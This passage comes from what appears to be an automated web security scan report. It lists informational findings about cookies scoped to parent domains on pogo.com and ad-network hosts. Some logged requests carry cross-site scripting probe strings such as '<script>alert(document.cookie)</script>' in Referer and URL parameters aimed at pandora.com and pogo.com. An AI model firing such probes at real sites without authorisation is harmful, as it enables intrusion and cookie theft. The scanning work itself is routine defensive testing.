Set-Cookie: JSESSIONID=C8DDA40C8F4C2B65082C50B995B886FC; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:01:46 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

9.10. http://altfarm.mediaplex.com/ad/js/55290 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/55290

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/55290?mpt=3334527&mpvc=&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc=
Content-Length: 0
Date: Sun, 09 Jan 2011 02:01:54 GMT

9.11. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036333&rn=1663368886&c7=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&c4=http%253A%2F%2Fwww.pandora.com%2Fpeople%2F%253Fcf8db%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%2Fscript%25253E09862348e83%253D1&c8=Pandora%20Radio%20-%20Listen%20to%20Free%20Internet%20Radio%2C%2&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 09 Jan 2011 01:22:52 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

9.12. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=65044&c5=128887&c6=&cv=1.3&cj=1&rn=606698040 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 09 Jan 2011 01:22:56 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

9.13. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=268141464&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fhome%2Fhome.jsp%3Ff9258%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E4225969d669%3D1&d.r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 09 Jan 2011 01:24:25 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

9.14. http://board-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=9647E635CE26F393097DADDDE17451AE.000192; Domain=.pogo.com; Path=/
com.pogo.unid=6606282471652314; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?pageSection=footer_board HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=9647E635CE26F393097DADDDE17451AE.000192; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606282471652314; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:17 GMT; Path=/
Location: http://board-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fboard-games.pogo.com%2F%3FpageSection%3Dfooter_board
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache-Coyote/1.1

9.15. http://board-games.pogo.com/games/monopoly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/monopoly

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=C044D23F948B766D6981FBBCF5BAB72F.000115; Domain=.pogo.com; Path=/
com.pogo.unid=6606372665965638; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/monopoly HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=C044D23F948B766D6981FBBCF5BAB72F.000115; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606372665965638; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/
Location: http://board-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fboard-games.pogo.com%2Fgames%2Fmonopoly
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache-Coyote/1.1

9.16. http://board-games.pogo.com/games/online-chess previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/online-chess

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=8156B355ACCAE0414EB6405CFDC5596E.000226; Domain=.pogo.com; Path=/
com.pogo.unid=6606458565311528; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/online-chess HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=8156B355ACCAE0414EB6405CFDC5596E.000226; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606458565311528; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:19 GMT; Path=/
Location: http://board-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fboard-games.pogo.com%2Fgames%2Fonline-chess
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:19 GMT
Server: Apache-Coyote/1.1

9.17. http://board-games.pogo.com/games/risk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/risk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=B04A73F82288DFD7D07A20FE079D68B6.000048; Domain=.pogo.com; Path=/
com.pogo.unid=6606286766626273; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/risk HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=B04A73F82288DFD7D07A20FE079D68B6.000048; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606286766626273; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/
Location: http://board-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fboard-games.pogo.com%2Fgames%2Frisk
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache-Coyote/1.1

9.18. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A2=gn3Ka4Ki09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=2111603&Page=&PluID=0&Pos=7971\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-8299/Type-0/af8ca3b4-1635-4099-b4fd-ac379be0eaec.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_7971\=4288750
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:26 GMT
Connection: close

9.19. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A2=gn3Ka4JO09MY00008y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5Eeb25Per_Played%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0%5EebVideoStarted%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0&OptOut=0&ebRandom=0.4333476326428354&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP08y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F8y8ysF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F00358y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 01:34:53 GMT
Connection: close
Content-Length: 0

9.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 01:34:09 GMT
Connection: close
Content-Length: 1864

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

9.21. http://card-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=5CA8BC1EE74B1F0277527A2DFCBA98BA.000080; Domain=.pogo.com; Path=/
com.pogo.unid=6606260996807036; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=5CA8BC1EE74B1F0277527A2DFCBA98BA.000080; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606260996807036; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:34 GMT; Path=/
Location: http://card-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fcard-games.pogo.com%2F
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:33 GMT
Server: Apache-Coyote/1.1

9.22. http://card-games.pogo.com/games/cribbage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/games/cribbage

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=D6065BE700357567D81FA6325202FBAB.000289; Domain=.pogo.com; Path=/
com.pogo.unid=6606449975376793; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/cribbage HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=D6065BE700357567D81FA6325202FBAB.000289; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606449975376793; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:36 GMT; Path=/
Location: http://card-games.pogo.com/login/entry.jsp?sl=1&site=pogo&redr=http%3A%2F%2Fcard-games.pogo.com%2Fgames%2Fcribbage
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 02:06:36 GMT
Server: Apache-Coyote/1.1

9.23. http://card-games.pogo.com/games/rainy-day-spider-solitaire previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/games/rainy-day-spider-solitaire

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

prod.JID=E00D1123E11EC01BCF283E18C15DAA77.000289; Domain=.pogo.com; Path=/
com.pogo.unid=6606449975376790; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:35 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/rainy-day-spider-solitaire HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=E00D1123E11EC01BCF283E18C15DAA77.000289; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606449975376790; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:35 GMT; Path=/
